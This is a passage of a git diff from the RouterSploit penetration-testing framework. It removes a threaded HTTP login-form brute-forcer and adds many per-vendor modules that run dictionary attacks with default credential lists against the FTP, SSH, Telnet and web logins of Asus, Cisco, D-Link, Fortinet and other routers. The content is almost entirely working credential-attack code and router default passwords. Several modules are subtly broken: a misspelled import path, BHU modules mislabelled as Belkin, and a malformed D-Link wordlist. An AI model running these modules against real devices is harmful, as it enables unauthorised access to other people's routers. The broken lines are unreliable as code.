Path') - form_path = exploits.Option('same', 'same as path or URL Form Path') - verbosity = exploits.Option('yes', 'Display authentication attempts') - stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt') - - credentials = [] - data = "" - invalid = {"min": 0, "max": 0} - - def run(self): - self.credentials = [] - self.attack() - - def get_form_path(self): - if self.form_path == 'same': - return self.path - else: - return self.form_path - - @multi - def attack(self): - url = sanitize_url("{}:{}{}".format(self.target, self.port, self.get_form_path())) - - try: - requests.get(url, verify=False) - except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema): - print_error("Invalid URL format: %s" % url) - return - except requests.exceptions.ConnectionError: - print_error("Connection error: %s" % url) - return - - # authentication type - if self.form == 'auto': - form_data = self.detect_form() - - if form_data is None: - print_error("Could not detect form") - return - - (form_action, self.data) = form_data - if form_action: - self.path = form_action - else: - self.data = self.form - - print_status("Attacking: ", self.path) - print_status("Using following data: ", self.data) - - # invalid authentication - self.invalid_auth() - - # running threads - if self.defaults.startswith('file://'): - defaults = open(self.defaults[7:], 'r') - else: - defaults = [self.defaults] - - collection = LockedIterator(defaults) - self.run_threads(self.threads, self.target_function, collection) - - if len(self.credentials): - print_success("Credentials found!") - headers = ("Target", "Port", "Login", "Password") - print_table(headers, *self.credentials) - else: - print_error("Credentials not found") - - def invalid_auth(self): - for i in range(0, 21, 5): - url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) - headers = {u'Content-Type': u'application/x-www-form-urlencoded'} - - user = "A" * i - password = "A" * i - - postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password) - r = requests.post(url, headers=headers, data=postdata, verify=False) - length = len(r.text) - - if i == 0: - self.invalid = {"min": length, "max": length} - - if length < self.invalid["min"]: - self.invalid["min"] = length - elif length > self.invalid["max"]: - self.invalid["max"] = length - - def detect_form(self): - url = sanitize_url("{}:{}{}".format(self.target, self.port, self.get_form_path())) - r = requests.get(url, verify=False) - soup = BeautifulSoup(r.text, "lxml") - - forms = soup.findAll("form") - - if forms is None: - return None - - res = [] - action = None - user_name_list = ["username", "user", "user_name", "login", "username_login", "nameinput", "uname", "__auth_user", "txt_user", "txtusername"] - password_list = ["password", "pass", "password_login", "pwd", "passwd", "__auth_pass", "txt_pwd", "txtpwd"] - found = False - - for form in forms: - tmp = [] - - if not len(form): - continue - - action = form.attrs.get('action', None) - if action and not action.startswith("/"): - action = "/" + action - - for inp in form.findAll("input"): - attributes = ["name", "id"] - - for atr in attributes: - if atr not in inp.attrs.keys(): - continue - - if inp.attrs[atr].lower() in user_name_list and inp.attrs['type'] != "hidden": - found = True - tmp.append(inp.attrs[atr] + "=" + "{{USER}}") - elif inp.attrs[atr].lower() in password_list and inp.attrs['type'] != "hidden": - found = True - tmp.append(inp.attrs[atr] + "=" + "{{PASS}}") - else: - if 'value' in inp.attrs.keys(): - tmp.append(inp.attrs[atr] + "=" + inp.attrs['value']) - elif inp.attrs['type'] not in ("submit", "button"): - tmp.append(inp.attrs[atr] + "=") - - if found: - res = tmp - - res = list(set(res)) - return (action, '&'.join(res)) - - def target_function(self, running, data): - module_verbosity = boolify(self.verbosity) - name = threading.current_thread().name - url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) - headers = {u'Content-Type': u'application/x-www-form-urlencoded'} - - print_status(name, 'process is starting...', verbose=module_verbosity) - - while running.is_set(): - try: - line = data.next().split(":") - user = line[0].strip() - password = line[1].strip() - - postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password) - r = requests.post(url, headers=headers, data=postdata, verify=False) - length = len(r.text) - - if length < self.invalid["min"] or length > self.invalid["max"]: - if boolify(self.stop_on_success): - running.clear() - - print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity) - self.credentials.append((self.target, self.port, user, password)) - else: - print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity) - except StopIteration: - break - - print_status(name, 'process is terminated.', verbose=module_verbosity) diff --git a/routersploit/modules/creds/printers/__init__.py b/routersploit/modules/creds/printers/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/__init__.py b/routersploit/modules/creds/routers/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/asmax/__init__.py b/routersploit/modules/creds/routers/asmax/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/asmax/ftp_default_creds.py b/routersploit/modules/creds/routers/asmax/ftp_default_creds.py new file mode 100644 index 000000000..fc888af57 --- /dev/null +++ b/routersploit/modules/creds/routers/asmax/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Asmax Router Default FTP Creds", + "description": "Module performs dictionary attack against Asmax Router FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Asmax Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port(file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,suppport:support,user:user", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/asmax/ssh_default_creds.py b/routersploit/modules/creds/routers/asmax/ssh_default_creds.py new file mode 100644 index 000000000..0501bf056 --- /dev/null +++ b/routersploit/modules/creds/routers/asmax/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Asmax Router Default SSH Creds", + "description": "Module performs dictionary attack against Asmax Router SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Asmax Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,support:support,user:user", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/asmax/telnet_default_creds.py b/routersploit/modules/creds/routers/asmax/telnet_default_creds.py new file mode 100644 index 000000000..2d3eeeec9 --- /dev/null +++ b/routersploit/modules/creds/routers/asmax/telnet_default_creds.py @@ -0,0 +1,23 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Asmax Router Default Telnet Creds", + "description": "Module performs dictionary attack against Asmax Router Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Asmax Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,support:support,user:user", "User:Pass or file with default credentials (file://)") + diff --git a/routersploit/modules/creds/routers/asmax/webinterface_http_auth_default_creds.py b/routersploit/modules/creds/routers/asmax/webinterface_http_auth_default_creds.py new file mode 100644 index 000000000..795e606ae --- /dev/null +++ b/routersploit/modules/creds/routers/asmax/webinterface_http_auth_default_creds.py @@ -0,0 +1,23 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.http_basic_digest_default import Exploit as HTTPBasicDigestDefault + + +class Exploit(HTTPBasicDigestDefault): + __info__ = { + "name": "Asmax Router Default Web Interface Creds - HTTP Auth", + "description": "Module performs dictionary attack against Asmax Router web interface. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Asmax Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(80, "Target HTTP port") + path = OptString("/", "Target path") + + threads = OptInteger(1, "Number of threads") + default = OptWordlist("admin:admin,support:support,user:user", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/asus/__init__.py b/routersploit/modules/creds/routers/asus/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/asus/ftp_default_creds.py b/routersploit/modules/creds/routers/asus/ftp_default_creds.py new file mode 100644 index 000000000..f9fdf41d4 --- /dev/null +++ b/routersploit/modules/creds/routers/asus/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Asus Router Default FTP Creds", + "description": "Module performs dictionary attack against Asus Router FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Asus Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:password,root:root,Admin:Admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/asus/ssh_default_creds.py b/routersploit/modules/creds/routers/asus/ssh_default_creds.py new file mode 100644 index 000000000..af33450bb --- /dev/null +++ b/routersploit/modules/creds/routers/asus/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Asus Router Default SSH Creds", + "description": "Module performs dictionary attack against Asus Router SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Asus Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:passsword,root:root,Admin:Admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/asus/telnet_default_creds.py b/routersploit/modules/creds/routers/asus/telnet_default_creds.py new file mode 100644 index 000000000..cfc23838a --- /dev/null +++ b/routersploit/modules/creds/routers/asus/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Asus Router Default Telnet Creds", + "description": "Module performs dictionary attack against Asus Router Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Asus Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:password,root:root,Admin:Admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/belkin/__init__.py b/routersploit/modules/creds/routers/belkin/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/belkin/ftp_default_creds.py b/routersploit/modules/creds/routers/belkin/ftp_default_creds.py new file mode 100644 index 000000000..692e4ded6 --- /dev/null +++ b/routersploit/modules/creds/routers/belkin/ftp_default_creds.py @@ -0,0 +1,23 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Belkin Router Default FTP Creds", + "description": "Module performs dictionary attack against Belkin Router FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Belkin Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:password", "User:Pass or file with default credentials (file://)") + diff --git a/routersploit/modules/creds/routers/belkin/ssh_default_creds.py b/routersploit/modules/creds/routers/belkin/ssh_default_creds.py new file mode 100644 index 000000000..e4e8b5546 --- /dev/null +++ b/routersploit/modules/creds/routers/belkin/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Belkin Router Default SSH Creds", + "description": "Module performs dictionary attack against Belkin Router SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Belkin Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:password", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/belkin/telnet_default_creds.py b/routersploit/modules/creds/routers/belkin/telnet_default_creds.py new file mode 100644 index 000000000..8769bfea7 --- /dev/null +++ b/routersploit/modules/creds/routers/belkin/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Belkin Router Default Telnet Creds", + "description": "Module performs dictionary attack against Belkin Router Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Belkin Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:password", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/bhu/__init__.py b/routersploit/modules/creds/routers/bhu/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/bhu/ftp_default_creds.py b/routersploit/modules/creds/routers/bhu/ftp_default_creds.py new file mode 100644 index 000000000..15b525425 --- /dev/null +++ b/routersploit/modules/creds/routers/bhu/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Belkin Router Default FTP Creds", + "description": "Module performs dictionary attack against Belkin Router FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", + ], + "devices": [ + "Belkin Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/bhu/ssh_default_creds.py b/routersploit/modules/creds/routers/bhu/ssh_default_creds.py new file mode 100644 index 000000000..bc45f9a54 --- /dev/null +++ b/routersploit/modules/creds/routers/bhu/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.genrric.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Belkin Router Default SSH Creds", + "description": "Module performs dictionary attack against Belkin Router SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Belkin Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/bhu/telnet_default_creds.py b/routersploit/modules/creds/routers/bhu/telnet_default_creds.py new file mode 100644 index 000000000..21aa2037f --- /dev/null +++ b/routersploit/modules/creds/routers/bhu/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Belkin Router Telnet Creds", + "description": "Module performs dictioanry attack against Belkin Router Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Belkin Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/billion/__init__.py b/routersploit/modules/creds/routers/billion/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/billion/ftp_default_creds.py b/routersploit/modules/creds/routers/billion/ftp_default_creds.py new file mode 100644 index 000000000..4a70f1e83 --- /dev/null +++ b/routersploit/modules/creds/routers/billion/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Billion Router Default FTP Creds", + "description": "Module performs dictionary attack against Billion Router FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Billion Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Taret FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/billion/ssh_default_creds.py b/routersploit/modules/creds/routers/billion/ssh_default_creds.py new file mode 100644 index 000000000..eaa0ccfea --- /dev/null +++ b/routersploit/modules/creds/routers/billion/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Billion Router Default SSH Creds", + "description": "Module performs dictionary attack against Billion Router SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", + ], + "devices": [ + "Billion Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/billion/telnet_default_creds.py b/routersploit/modules/creds/routers/billion/telnet_default_creds.py new file mode 100644 index 000000000..c4ce4153a --- /dev/null +++ b/routersploit/modules/creds/routers/billion/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Billion Router Default Telnet Creds", + "description": "Module performs dictionary attack against Billion Router Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", + ], + "devices": [ + "Billion Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/cisco/__init__.py b/routersploit/modules/creds/routers/cisco/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/cisco/ftp_default_creds.py b/routersploit/modules/creds/routers/cisco/ftp_default_creds.py new file mode 100644 index 000000000..f8d9a968c --- /dev/null +++ b/routersploit/modules/creds/routers/cisco/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Cisco Router Default FTP Creds", + "description": "Module performs dictionary attack against Cisco Router FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Cisc Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/cisco/ssh_default_creds.py b/routersploit/modules/creds/routers/cisco/ssh_default_creds.py new file mode 100644 index 000000000..3c7b01d69 --- /dev/null +++ b/routersploit/modules/creds/routers/cisco/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Cisco Router Default SSH Creds", + "description": "Module performs dictionary attack against Cisco Router SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Cisco Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/cisco/telnet_default_creds.py b/routersploit/modules/creds/routers/cisco/telnet_default_creds.py new file mode 100644 index 000000000..4b455d301 --- /dev/null +++ b/routersploit/modules/creds/routers/cisco/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Cisco Router Default Telnet Creds", + "description": "Module performs dictionary attack against Cisco Router Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Cisco Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or f ile with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/comtrend/__init__.py b/routersploit/modules/creds/routers/comtrend/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/comtrend/ftp_default_creds.py b/routersploit/modules/creds/routers/comtrend/ftp_default_creds.py new file mode 100644 index 000000000..dd450451f --- /dev/null +++ b/routersploit/modules/creds/routers/comtrend/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Comtrend Router Default FTP Creds", + "description": "Module performs dictionary attack against Comtrend Router FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Comtrend Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/comtrend/ssh_default_creds.py b/routersploit/modules/creds/routers/comtrend/ssh_default_creds.py new file mode 100644 index 000000000..24d2afc26 --- /dev/null +++ b/routersploit/modules/creds/routers/comtrend/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Comtrend Router Default SSH Creds", + "description": "Module performs dictionary attack against Comtrend Router SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Comtrend Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/comtrend/telnet_default_creds.py b/routersploit/modules/creds/routers/comtrend/telnet_default_creds.py new file mode 100644 index 000000000..984cc9fde --- /dev/null +++ b/routersploit/modules/creds/routers/comtrend/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Comtrend Router Default Telnet Creds", + "description": "Module performs dictionary attack against Comtrend Router Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Comtrend Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or f ile with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/dlink/__init__.py b/routersploit/modules/creds/routers/dlink/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/dlink/ftp_default_creds.py b/routersploit/modules/creds/routers/dlink/ftp_default_creds.py new file mode 100644 index 000000000..b0e6023f8 --- /dev/null +++ b/routersploit/modules/creds/routers/dlink/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "D-Link Router Default FTP Creds", + "description": "Module performs dictionary attack against D-Link Router FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "D-Link Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,1234:1234,root:12345,root:root", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/dlink/ssh_default_creds.py b/routersploit/modules/creds/routers/dlink/ssh_default_creds.py new file mode 100644 index 000000000..ef2aeddc3 --- /dev/null +++ b/routersploit/modules/creds/routers/dlink/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "D-Link Router Default SSH Creds", + "description": "Module performs dictionary attack against D-Link Router SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "D-Link Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin:1234:1234,:root:12345,root:root", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/dlink/telnet_default_creds.py b/routersploit/modules/creds/routers/dlink/telnet_default_creds.py new file mode 100644 index 000000000..66b1e35fe --- /dev/null +++ b/routersploit/modules/creds/routers/dlink/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "D-Link Router Default Telnet Creds", + "description": "Module performs dictionary attack against D-Link Router Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "D-Link Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,1234:1234,root:12345,root:root", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/fortinet/__init__.py b/routersploit/modules/creds/routers/fortinet/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/fortinet/ftp_default_creds.py b/routersploit/modules/creds/routers/fortinet/ftp_default_creds.py new file mode 100644 index 000000000..d4240e7ac --- /dev/null +++ b/routersploit/modules/creds/routers/fortinet/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Fortinet Router Default FTP Creds", + "description": "Module performs dictionary attack against Fortinet Router FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Fortinet Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:,maintainer:bcpb+serial#,maintainer:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/fortinet/ssh_default_creds.py b/routersploit/modules/creds/routers/fortinet/ssh_default_creds.py new file mode 100644 index 000000000..02f6a5cc5 --- /dev/null +++ b/routersploit/modules/creds/routers/fortinet/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Fortinet Router Default SSH Creds", + "description": "Module performs dictionary attack against Fortinet Router SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Fortinet Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 adddress or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:,maintainer:bcpb+serial#,maintainer:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/fortinet/telnet_default_creds.py b/routersploit/modules/creds/routers/fortinet/telnet_default_creds.py new file 